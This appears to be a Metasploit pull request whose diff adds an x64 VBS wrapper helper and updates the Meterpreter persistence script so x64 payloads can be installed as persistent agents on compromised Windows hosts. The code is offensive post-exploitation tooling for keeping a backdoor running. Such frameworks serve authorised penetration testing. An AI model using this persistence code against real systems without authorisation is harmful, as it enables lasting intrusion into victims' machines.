### PR TITLE
Fix persistence script to support x64 payloads

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1121,6 +1121,10 @@ require 'msf/core/exe/segment_appender'
     to_exe_vbs(to_win32pe(framework, code, opts), opts)
   end
 
+  def self.to_win64pe_vbs(framework, code, opts = {})
+    to_exe_vbs(to_win64pe(framework, code, opts), opts)
+  end
+
   # Creates a jar file that drops the provided +exe+ into a random file name
   # in the system's temp dir and executes it.
   #

--- a/scripts/meterpreter/persistence.rb
+++ b/scripts/meterpreter/persistence.rb
@@ -72,13 +72,23 @@ end
 
 # Function for Creating persistent script
 #-------------------------------------------------------------------------------
-def create_script(delay,altexe,raw)
-  if altexe
-    vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
-                                          {:persist => true, :delay => delay, :template => altexe})
+def create_script(delay,altexe,raw,is_x64)
+  if is_x64
+    if altexe
+      vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
+                                            {:persist => true, :delay => delay, :template => altexe})
+    else
+      vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
+                                            {:persist => true, :delay => delay})
+    end
   else
-    vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
-                                          {:persist => true, :delay => delay})
+    if altexe
+      vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
+                                            {:persist => true, :delay => delay, :template => altexe})
+    else
+      vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
+                                            {:persist => true, :delay => delay})
+    end
   end
   print_status("Persistent agent script is #{vbs.length} bytes long")
   return vbs
@@ -224,7 +234,7 @@ print_status("Running Persistance Script")
 print_status("Resource file for cleanup created at #{@clean_up_rc}")
 # Create and Upload Payload
 raw = create_payload(payload_type, rhost, rport)
-script = create_script(delay, altexe, raw)
+script = create_script(delay, altexe, raw, payload_type.include?('/x64/'))
 script_on_target = write_script_to_target(target_dir, script)
 
 # Start Multi/Handler


### PR DESCRIPTION
As documented in #5189 x64 payloads weren't working with `scripts/meterpreter/persistence`. This is a quick fix to get that going.
- Adds a small helper function to generate x64 vbs code from raw payloads.
- Adjusts the script so that it does a really simple check for x64 payloads (by searching for `/x64/` in the payload name) and calls the appropriate function based on the result.

This is a bit of a quick/dirty fix, but scripts are quick any dirty anyway!
### Verification
- [x] Make sure that running the persistence scripts works as expected for both x64 and x86 payloads.
